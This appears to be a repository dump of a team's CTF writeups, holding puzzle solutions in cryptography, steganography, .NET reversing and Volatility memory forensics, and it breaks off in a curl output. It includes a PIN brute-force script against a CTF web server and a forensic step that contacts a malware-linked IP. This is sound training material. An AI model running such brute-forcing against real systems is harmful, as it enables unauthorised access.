├── 2016
├── 3ds
│ ├── BlueScreen
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ └── README.md
│ ├── Excaliflag
│ │ ├── 1.png
│ │ ├── README.md
│ │ └── flag.png
│ ├── HALP
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── HotSun
│ │ └── README.md
│ ├── SantaWalksIntoABar
│ │ ├── README.md
│ │ ├── a5d744fb06e04bacfde2e7b713054145.zip
│ │ └── solve.py
│ └── shamecontrol
│ │ └── README.md
├── americanidiot
│ ├── cripto30
│ │ ├── README.md
│ │ ├── audio.wav
│ │ ├── audio1.png
│ │ └── flag.png
│ ├── rev20
│ │ ├── info
│ │ └── solve
│ ├── rev30
│ │ ├── info
│ │ └── solve
│ ├── steg40
│ │ ├── README.md
│ │ └── info
│ ├── web30
│ │ ├── info
│ │ └── solve
│ └── web50
│ │ ├── info
│ │ └── solve.py
├── oldreligion
│ ├── cripto10
│ │ └── README.md
│ ├── cripto20
│ │ ├── README.md
│ │ └── tabuleiro_final.png
│ ├── cripto30
│ │ ├── README.md
│ │ ├── alfabeto.gif
│ │ └── malachim.png
│ ├── for30
│ │ ├── README.md
│ │ ├── error.log
│ │ └── solver.png
│ ├── web10
│ │ ├── README.md
│ │ └── bizarro.jpg
│ └── web20
│ │ ├── README.md
│ │ ├── imagem.jpg
│ │ └── solve.py
├── seccon
│ ├── Memory Analysis
│ │ ├── README.md
│ │ └── memoryanalysis.zip
│ ├── Vigenere
│ │ ├── README.md
│ │ └── vigenere.png
│ └── voip
│ │ ├── 1.jpg
│ │ ├── 2.jpg
│ │ ├── README.MD
│ │ └── voip.pcap
├── sharifctf
│ └── rev-50
│ │ ├── README.md
│ │ └── getit
└── tarfull
│ ├── arq.zip
│ └── solve.py
├── 2017
├── 3DSCTF
│ └── cappo
│ │ ├── README.md
│ │ └── solve.py
├── AlexCTF
│ ├── README.md
│ ├── cr1
│ │ ├── 1.png
│ │ ├── README.MD
│ │ ├── solve.py
│ │ └── zero_one
│ ├── cr2
│ │ ├── README.md
│ │ └── manyTimePadAttack.py
│ ├── cr3
│ │ ├── README.md
│ │ └── cr3.py
│ ├── cr4
│ │ ├── README.md
│ │ ├── key.pvt
│ │ ├── poor_rsa.tar.gz
│ │ └── poorrsa.py
│ ├── fore1
│ │ ├── README.MD
│ │ └── fore1.core
│ └── re4
│ │ ├── README.md
│ │ └── re4.py
├── BSides
│ ├── Ancient Hop Grain Juice
│ │ └── README.MD
│ ├── Forensics-easycap
│ │ ├── README.MD
│ │ └── easycap.pcap
│ ├── MISC-Let-s play a game
│ │ └── README.MD
│ ├── MISC-Quote
│ │ └── README.MD
│ ├── MISC-The Right Cipher
│ │ └── README.MD
│ ├── NOP
│ │ └── README.MD
│ ├── Zumbo
│ │ ├── 1.png
│ │ └── README.MD
│ └── easyshell
│ │ └── README.md
├── BitsCTF
│ ├── Batman vs Joker
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── BotBot
│ │ ├── 1.png
│ │ ├── 2.png
│ │ └── README.MD
│ ├── Labour
│ │ └── README.MD
│ ├── README.MD
│ └── Sherlock
│ │ ├── 1.png
│ │ ├── README.MD
│ │ └── solve.py
├── BreakIn
│ ├── A present for her Birthday!
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ └── README.MD
│ ├── A weird C program
│ │ ├── README.md
│ │ └── program.cpp
│ ├── Fast and Furious
│ │ ├── README.md
│ │ ├── chromedriver
│ │ └── solve.py
│ ├── Hello world
│ │ ├── 1.png
│ │ └── README.MD
│ ├── Simple Secret - Part 1
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── README.MD
│ │ └── simple_secret1
│ └── Simple Secret - Part 2
│ │ ├── 1.png
│ │ ├── 2.png
│ │ ├── 3.png
│ │ ├── README.MD
│ │ └── simple_secret2
├── HackIM
│ ├── Programming
│ │ └── 1
│ │ │ ├── README.md
│ │ │ ├── abc.txt
│ │ │ ├── flag.png
│ │ │ └── solve.py
│ ├── README.md
│ └── Web
│ │ ├── 1
│ │ ├── 1.png
│ │ └── README.MD
│ │ └── 2
│ │ └── README.MD
├── README.md
├── TUCTF
│ ├── cookieHarrelson
│ │ └── README.md
│ └── gitGud
│ │ └── README.md
└── sqlinjChalls
│ ├── README.md
│ ├── level1
│ ├── README.md
│ ├── level1.php
│ └── level1.png
│ └── level2
│ ├── README.md
│ ├── flag1.png
│ ├── flag2.png
│ ├── level2.php
│ └── level2.png
├── 2018
├── EasyCTF
│ └── digging_for_soup.md
└── Pragyan
│ ├── crypto
│ └── xmen_or_the_avengers
│ │ ├── README.md
│ │ ├── info_clear.txt
│ │ ├── info_crypt.txt
│ │ └── superheroes_group_info_crypt.txt
│ └── reverse
│ └── assemble
│ └── README.md
└── README.md
/2016/3ds/BlueScreen/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/1.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/2.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/BlueScreen/3.png
--------------------------------------------------------------------------------
/2016/3ds/BlueScreen/README.md:
--------------------------------------------------------------------------------
1 | # BlueScreen
2 |
3 | ## Description
4 | [PT-BR]
5 | Esse software de gerar relatorio bacana quando funcionava.
6 | Nao acho mais os arquivos! Agora nao sei se ele nao baixa.
7 | Mestre resolva isso e como recompensa deixei a flag no relatorio.
8 |
9 | [EN]
10 | This report generator software was good until stop works. I can't find my files. Now I don't know why the downloads doesn't works.
11 | Solve the challenge and as a reward there is a flag into the report.
12 |
13 | ## Solution
14 |
15 | The challenge redirected us to a website asking to install a component, required to load the application. Our goal was to find the report and get the flag.
16 |
17 | 
18 |
19 | As we can see, in this challenge we had some .NET application to play with! :D
20 |
21 | After installing the component, we can see a simple app with just one button labeled "Iniciar", but when you clicked the button, an exception was showed to us on the screen.
22 |
23 | 
24 |
25 | With the application up and running, we can use some .NET decompiler to check inside the "source code" and see if we get something interesting. My favorite decompiler is DnSpy, you can check it in the end of the writeup.
26 |
27 | Let's take a look.
28 |
29 | In this simple procedure, we found some this piece of code:
30 |
31 | 
32 |
33 | ```bash
34 | webClient.DownloadFile("http://162.243.187.35:8080/relatorio.png", "!c:/relatorio.xlsx");
35 | webClient.DownloadFile("http://162.243.187.35:8080/relatorio.xlsx", "!c:/relatorio.png");
36 | ```
37 |
38 | The PNG image is just a distraction *(we saw a lot of fake flags on this CTF, and it was fun!)*.
39 |
40 | The xlsx file had three worksheets, and in the third one, there was the flag!
41 |
42 | Flag: 3DS{Windows_0/Windows_DotNet}
43 |
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/Excaliflag/1.png
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/README.md:
--------------------------------------------------------------------------------
1 | # Excaliflag
2 |
3 | ## Description
4 | [EN]
5 | Only a true hacker could pulling the flag from this ground.
6 |
7 | [PT]
8 | Somente um verdadeiro hacker poderia puxar a bandeira deste chao.
9 |
10 | ## Solution
11 |
12 | The image contains a real flag stuck into the ground and nothing more.
13 | Using the gray bits filter from [Stegsolve](https://github.com/zardus/ctf-tools/blob/master/stegsolve/install), the flag was revealed.
14 |
15 | 
16 |
17 | Flag: 3DS{Gr4b_0nly_th1s_B1ts}
--------------------------------------------------------------------------------
/2016/3ds/Excaliflag/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/Excaliflag/flag.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/1.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/2.png
--------------------------------------------------------------------------------
/2016/3ds/HALP/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/HALP/README.MD
--------------------------------------------------------------------------------
/2016/3ds/HotSun/README.md:
--------------------------------------------------------------------------------
1 | #Hot Sun?
2 |
3 | ~~~~
4 | [EN]
5 | Surfing in the Shallowweb, we have discovered a new algorithm that promises to be the newest substituition cipher. The algorithm to encrypt works as following: the user informs the text to be encrypted and a number N. Initially, the algorithm shift all letters one position to the right (e.g. 'A' tuns into 'B'). With this result, in the next step, the algorithm now shift the text two positions to the right. And with the text from the previous output, it repeats the shift procedure until N. Your task is quite simple: given an encrypted flag and an N number, discover the flag.
6 | Encrypted flag: 3RG{hv1g_f0h_1g_b0h_g0_V0h} N: 11
7 |
8 | [PT-BR]
9 | Pesquisando na shallowweb, descobrimos um novo algoritmo que promete ser a mais nova cifra de substituicao. O algoritmo para cifrar funciona da seguinte forma: o usuraio informa o texto a ser cifrado e um numero N. O algoritmo, inicialmente, desloca todas as letras em uma posicao a direita ('A', por exemplo, vira 'B). Com o texto da saida, no passo seguinte, o algoritmo desloca esse novo texto duas posicoes a direita. E com o texto da saida anterior, ele repete o procedimento de deslocamentos ate o numero N. Sua tarefa bem simples: dado a flag cifrada e um numero N, descubra a flag.
10 | Flag cifrada: 3RG{hv1g_f0h_1g_b0h_g0_V0h}
11 | N: 11
12 | ~~~~
13 |
14 | This is a very simple chall about ROTs. There are 2 approaches here: whether you try to really understand what is going on, ROT by ROT, or you just solve it.
15 |
16 | We assumed a pretty obvious principle: the composition of ROTs is just another ROT. This means if you rotate *x* times to the right, then *y* to the left, then right again and so on, all this is equivlent to a single *ROT Z*. A nice example of an isomorphism.
17 |
18 | Since the beginning of the flag must be *3DS*, we know that *R* goes to *D*. This means that we are rotating everything *ord ('R') - ord('D') == 14*. A simple ROT14 then. The flag should be 3DS{th1s_r0t_1s_n0t_s0_H0t}.
19 |
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/README.md:
--------------------------------------------------------------------------------
1 | #Santa Walks Into a Bar
2 |
3 | ~~~~
4 | [EN]
5 | Santa walks into a bar and creates a friendship bound with you.
6 | After some shots, he spells to you his secrets to delivery all gifts on Christmas: he has a magical linked list that inform the next kiddie to visit.
7 | At the end of the night, he goes alway and left behind his wallet and the bag with the list of gifts to delivery. Try to discover if you will receive something.
8 |
9 | [PT-BR]
10 | Papai noel entra em um bar e cria um laço de amizade com voce.
11 | Apos algumas bebidas, ele conta seu segredo para entregar todos os presentes de Natal: ele tem uma lista ligada que informa qual a porxima crianca que ele deve visitar. No final da noite, ele foi embora e esqueceu a carteira e a bolsa com a lista de presentes para entregar. Tente descobrir se voce ira receber alguma coisa.
12 | ~~~~
13 |
14 | The given file is a *.zip* with lots of *.png* files within. Each file is a QR code that translates to a simple message indicating a name of a child. Our goal is to find the one addressed to us.
15 |
16 | Althoug the chall mentions a linked list, there is indeed no need of it. Each translated QR code actually points to another file name, therefore we could simply run all the nodes of the list. However there are actually some few linked lists put toghether in this folder. If you start with a random node, say the first file in alphabetic order, you might end up with a message like "Fail!" being the last node of this list.
17 |
18 | Instead of trying every possible list, we decided to simply check all files inside the folder sequentially. Nevertheless, we are still talking about a linked list anyhow :)
19 |
20 | This silly script did the trick in a few minutes:
21 |
22 | ~~~~
23 | import os
24 | import qrtools
25 |
26 | qr = qrtools.QR()
27 | for idx, f in enumerate(os.listdir(".")):
28 | if "solve" in f:
29 | continue
30 | qr.decode(f)
31 | if "you" in qr.data:
32 | print "File content >> %s" % qr.data
33 | img = qr.data.rsplit(' ', 1)[1]+".png"
34 | qr.decode(img)
35 | print " " + img + " >> " + qr.data
36 | ~~~~
37 |
38 | And the output:
39 |
40 | ~~~~
41 | File content >> Next kiddie is you in 6f0600da67c1870c157d1f61e0c58091
42 | 6f0600da67c1870c157d1f61e0c58091.png >> Yu u no following right?
43 | File content >> A child in you in ed7b0eaaf64c9bf6c90299f6cbe6d4e1
44 | ed7b0eaaf64c9bf6c90299f6cbe6d4e1.png >> Fail
45 | File content >> A kid called you in dec1eadad9056c9ebde333c90cfd3769
46 | dec1eadad9056c9ebde333c90cfd3769.png >> Ops!
47 | File content >> A kid called you in 0a6d1cb51e224c3ad799fc91c9c5f68e
48 | 0a6d1cb51e224c3ad799fc91c9c5f68e.png >> So wrong!
49 | File content >> I almost forgot you in 3ab3b4b87d57315315cbb0259a262177
50 | 3ab3b4b87d57315315cbb0259a262177.png >> Y0ur gift is in goo.gl/wFGwqO inugky3leb2gqzjanruw42yk
51 | File content >> A child in you in 6fece9e2a5b49c07cdd7e8c3235ab724
52 | 6fece9e2a5b49c07cdd7e8c3235ab724.png >> Wrong!
53 | ~~~~
54 |
55 | There you go! Just check the address *https://goo.gl/wFGwqO* to get the flag:
56 |
57 | 3DS{I_h0p3_th4t_Y0u_d1d_n0t_h4v3_ch4ck3d_OnE_by_0n3}
58 |
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/a5d744fb06e04bacfde2e7b713054145.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/3ds/SantaWalksIntoABar/a5d744fb06e04bacfde2e7b713054145.zip
--------------------------------------------------------------------------------
/2016/3ds/SantaWalksIntoABar/solve.py:
--------------------------------------------------------------------------------
1 | import os
2 | import qrtools
3 |
4 | qr = qrtools.QR()
5 | for idx, f in enumerate(os.listdir(".")):
6 | if "solve" in f:
7 | continue
8 | qr.decode(f)
9 | if "you" in qr.data:
10 | print "File content >> %s" % qr.data
11 | img = qr.data.rsplit(' ', 1)[1]+".png"
12 | qr.decode(img)
13 | print " " + img + " >> " + qr.data
14 |
--------------------------------------------------------------------------------
/2016/3ds/shamecontrol/README.md:
--------------------------------------------------------------------------------
1 | # shamecontrol
2 |
3 | ## Description
4 | [EN]
5 | What if it is a Windows .exe, do you still can?
6 | Flag format: "3DS{flag}"
7 |
8 | [PT-BR]
9 | E se for binario Windows, voce ainda consegue?
10 | Flag no formato: "3DS{flag}"
11 |
12 | ## Solution
13 |
14 | Another .NET application, but this time there was no output when we tried to run the application in console mode. So, let's read the code:
15 |
16 | ```csharp
17 | namespace ConsoleApplication2
18 | {
19 | // Token: 0x02000002 RID: 2
20 | internal class Program
21 | {
22 | // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
23 | private static void Main(string[] args)
24 | {
25 | string text = "40";
26 | RegistryKey currentUser = Registry.CurrentUser;
27 | if (Debugger.IsAttached)
28 | {
29 | Console.WriteLine("3DS{2}j{0}t{0}v{0}c{0}b{0}nd{1}{3}", new object[]
30 | {
31 | text[1],
32 | text[0],
33 | "{",
34 | "}"
35 | });
36 | }
37 | RegistryKey registryKey = currentUser.OpenSubKey("parangaricutirimirruaro");
38 | if (registryKey != null)
39 | {
40 | Console.WriteLine("3DS{2}j{0}t{0}v{0}c{0}b{0}nd{1}{3}", new object[]
41 | {
42 | text[0],
43 | text[1],
44 | "{",
45 | "}"
46 | });
47 | registryKey.Close();
48 | }
49 | currentUser.Close();
50 | }
51 | }
52 | }
53 | ```
54 |
55 | A simple substitution on the given string was enough to get the solution. But there was some debugger verification on the code:
56 |
57 | ```csharp
58 | if (Debugger.IsAttached)
59 | ```
60 |
61 | This generates a fake flag: 3DS{j0t0v0c0b0nd4}
62 |
63 | The vector starts from zero, so the correct approach:
64 | ```
65 | text[0] = 4
66 | text[1] = 0
67 | ```
68 |
69 | Flag: 3DS{j4t4v4c4b4nd0}
70 |
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/README.md:
--------------------------------------------------------------------------------
1 | ### critpo30
2 |
3 | O arquivo baixado é um áudio .wav do presidente dos EUA Barack Obama anunciando a morte de Osama Bin Laden. Aparentemente não há nada de errado com o arquivo, mas com um pouco de paciência chegamos aos últimos segundos do áudio, em que se ouve um ruído, como se a flag falasse conosco :)
4 |
5 | Abrindo com o Audacity, podemos ver claramente o ruído a partir do tempo 1:15, mas não parece dizer muito.
6 |
7 | 
8 |
9 | Como o chall falava de duas técnicas, incluindo uma de cripto, pensei que o ruído poderia ser um código morse, binário, ou qualquer coisa do tipo. Como não achei nada disso, parti para outras análises da onda.
10 |
11 | O Audacity permite que visualizemos o áudio pelo espectrograma, ao invés do formato da onda. Para isso basta selecionar a opção na seta à esquerda da onda (audio).
12 |
13 | 
14 |
15 | Agora sim! Claramente nossa flag criptografada. Pelo formato é bem provável que seja uma cifra de substituição bem simples, como césar. Testando online [aqui](http://www.xarg.org/tools/caesar-cipher/) vemos que realmente é de fato um ROT23.
16 |
17 | O único problema é que essa flag não é aceita! Talvez o challenger quisesse colocar um pouco de guessing ou foi um erro de digitação mesmo. Adicionando o *e* que falta fechamos a questão :)
18 |
19 | flag: SHC{AudioInterceptMensagem}
20 |
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/audio.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/audio.wav
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/audio1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/audio1.png
--------------------------------------------------------------------------------
/2016/americanidiot/cripto30/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/cripto30/flag.png
--------------------------------------------------------------------------------
/2016/americanidiot/rev20/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev20/info
--------------------------------------------------------------------------------
/2016/americanidiot/rev20/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev20/solve
--------------------------------------------------------------------------------
/2016/americanidiot/rev30/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev30/info
--------------------------------------------------------------------------------
/2016/americanidiot/rev30/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/rev30/solve
--------------------------------------------------------------------------------
/2016/americanidiot/steg40/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/steg40/README.md
--------------------------------------------------------------------------------
/2016/americanidiot/steg40/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/steg40/info
--------------------------------------------------------------------------------
/2016/americanidiot/web30/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web30/info
--------------------------------------------------------------------------------
/2016/americanidiot/web30/solve:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web30/solve
--------------------------------------------------------------------------------
/2016/americanidiot/web50/info:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/americanidiot/web50/info
--------------------------------------------------------------------------------
/2016/americanidiot/web50/solve.py:
--------------------------------------------------------------------------------
1 | from urllib.request import urlopen
2 | import re
3 |
4 | def progress(count, total):
5 | return (count/total)*100
6 |
7 | for x in range(0, 999):
8 | url = "https://ctf.sucurihc.org/flag/eua/web50/?pin="+str(hex(x)[2:])
9 |
10 | print("[DEBUG] >>> Opening URL {}".format(url))
11 | print("{0:.2f}%".format(progress(x, 999)))
12 | conteudo = urlopen(url).read().decode('utf-8')
13 | #print(conteudo)
14 |
15 | result = re.findall("(.*?)", conteudo)[0]
16 | print(result)
17 |
18 | if 'SHC{' in result:
19 | break
20 |
21 |
--------------------------------------------------------------------------------
/2016/oldreligion/cripto10/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto10/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto20/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto20/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto20/tabuleiro_final.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto20/tabuleiro_final.png
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/alfabeto.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/alfabeto.gif
--------------------------------------------------------------------------------
/2016/oldreligion/cripto30/malachim.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/cripto30/malachim.png
--------------------------------------------------------------------------------
/2016/oldreligion/for30/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/for30/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/for30/solver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/for30/solver.png
--------------------------------------------------------------------------------
/2016/oldreligion/web10/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web10/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/web10/bizarro.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web10/bizarro.jpg
--------------------------------------------------------------------------------
/2016/oldreligion/web20/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web20/README.md
--------------------------------------------------------------------------------
/2016/oldreligion/web20/imagem.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/oldreligion/web20/imagem.jpg
--------------------------------------------------------------------------------
/2016/oldreligion/web20/solve.py:
--------------------------------------------------------------------------------
1 | from urllib.request import urlopen
2 | import re
3 |
4 | url = "https://ctf.sucurihc.org/flag/oldreligion/web20/index.html"
5 |
6 | print("[DEBUG] >> Opening url {}".format(url))
7 | conteudo = urlopen(url).read().decode("ISO-8859-1")
8 |
9 | print("[DEBUG] <<< Viewing content {}".format(conteudo))
10 | resultado = re.findall("alt=\"(.*?)(\"/|\" /)>", conteudo)
11 |
12 | flag = ""
13 | for letras in resultado:
14 | #print(str(letras[0]))
15 | flag += letras[0]
16 |
17 | print("Flag: {}".format(flag))
--------------------------------------------------------------------------------
/2016/seccon/Memory Analysis/README.md:
--------------------------------------------------------------------------------
1 | # Memory Analysis
2 | 100 points
3 | Memory Analysis
4 | Find the website that the fake svchost is accessing.
5 | You can get the flag if you access the website!!
6 |
7 | memoryanalysis.zip
8 |
9 | The challenge files are huge, please download it first.
10 | Hint1: http://www.volatilityfoundation.org/
11 | Hint2: Check the hosts file
12 | password: fjliejflsjiejlsiejee33cnc
13 |
14 | ## Resolution
15 |
16 | After unzip the file memoryanalysis.zip we get the forensic_100.raw, as the tip was give we need to use the volatility to get it up.
17 |
18 | Let's check the kind of the OS
19 | ```bash
20 | vol.py -f forensic_100.raw imageinfo
21 | Volatility Foundation Volatility Framework 2.5
22 | INFO : volatility.debug : Determining profile based on KDBG search...
23 | Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
24 | AS Layer1 : IA32PagedMemoryPae (Kernel AS)
25 | AS Layer2 : FileAddressSpace (/Users/cyborg/Downloads/forensic_100.raw)
26 | PAE type : PAE
27 | DTB : 0x34c000L
28 | KDBG : 0x80545ce0L
29 | Number of Processors : 1
30 | Image Type (Service Pack) : 3
31 | KPCR for CPU 0 : 0xffdff000L
32 | KUSER_SHARED_DATA : 0xffdf0000L
33 | Image date and time : 2016-12-06 05:28:47 UTC+0000
34 | Image local date and time : 2016-12-06 14:28:47 +0900
35 | ```
36 |
37 | Now we need to check if the hosts file exists
38 | ```bash
39 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 filescan | grep -i host
40 | Volatility Foundation Volatility Framework 2.5
41 | 0x000000000201ef90 1 0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
42 | 0x00000000020f0268 1 0 R--r-d \Device\HarddiskVolume1\WINDOWS\svchost.exe
43 | 0x000000000217b748 1 0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts
44 | 0x00000000024a7a90 1 0 R--rwd \Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
45 | ```
46 |
47 | Yep the file exists, let's extract it, so let's create a directory to store the file.
48 | ```bash
49 | mkdir output
50 | ```
51 |
52 | Now let's extract the file
53 | ```bash
54 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 dumpfiles -D output -Q 0x000000000217b748
55 | Volatility Foundation Volatility Framework 2.5
56 | DataSectionObject 0x0217b748 None \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts
57 | ```
58 |
59 | Let's check the hosts file
60 | ```bash
61 | cat output/file.None.0x819a3008.dat
62 | # Copyright (c) 1993-1999 Microsoft Corp.
63 | #
64 | # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
65 | #
66 | # This file contains the mappings of IP addresses to host names. Each
67 | # entry should be kept on an individual line. The IP address should
68 | # be placed in the first column followed by the corresponding host name.
69 | # The IP address and the host name should be separated by at least one
70 | # space.
71 | #
72 | # Additionally, comments (such as these) may be inserted on individual
73 | # lines or following the machine name denoted by a '#' symbol.
74 | #
75 | # For example:
76 | #
77 | # 102.54.94.97 rhino.acme.com # source server
78 | # 38.25.63.10 x.acme.com # x client host
79 |
80 | 127.0.0.1 localhost
81 | 153.127.200.178 crattack.tistory.com
82 | ```
83 |
84 | So the crattack.tistory.com does not work in the 153.127.200.178 ip address, let's check the correct one
85 | ```bash
86 | nslookup crattack.tistory.com
87 | Server: 8.8.8.8
88 | Address: 8.8.8.8#53
89 |
90 | Non-authoritative answer:
91 | Name: crattack.tistory.com
92 | Address: 175.126.170.110
93 | Name: crattack.tistory.com
94 | Address: 175.126.170.70
95 | ```
96 |
97 | Now let's check the iehistory
98 | ```bash
99 | vol.py -f forensic_100.raw --profile=WinXPSP2x86 iehistory | grep -i "crattack.tistory.com"
100 | Volatility Foundation Volatility Framework 2.5
101 | Location: http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
102 | Location: Visited: SYSTEM@http://crattack.tistory.com/rss
103 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
104 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
105 | Location: http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
106 | Location: Visited: SYSTEM@http://crattack.tistory.com/rss
107 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
108 | Location: Visited: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
109 | Location: :2016120620161207: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
110 | Location: :2016120620161207: SYSTEM@:Host: crattack.tistory.com
111 | Location: :2016120620161207: SYSTEM@http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd
112 | ```
113 |
114 | As we can see the SYSTEM called sometimes http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd so let's check it up
115 | ```bash
116 | curl -v 153.127.200.178/entry/Data-Science-import-pandas-as-pd
117 | * Trying 153.127.200.178...
118 | * Connected to 153.127.200.178 (153.127.200.178) port 80 (#0)
119 | > GET /entry/Data-Science-import-pandas-as-pd HTTP/1.1
120 | > Host: 153.127.200.178
121 | > User-Agent: curl/7.49.1
122 | > Accept: */*
123 | >
124 | < HTTP/1.1 200 OK
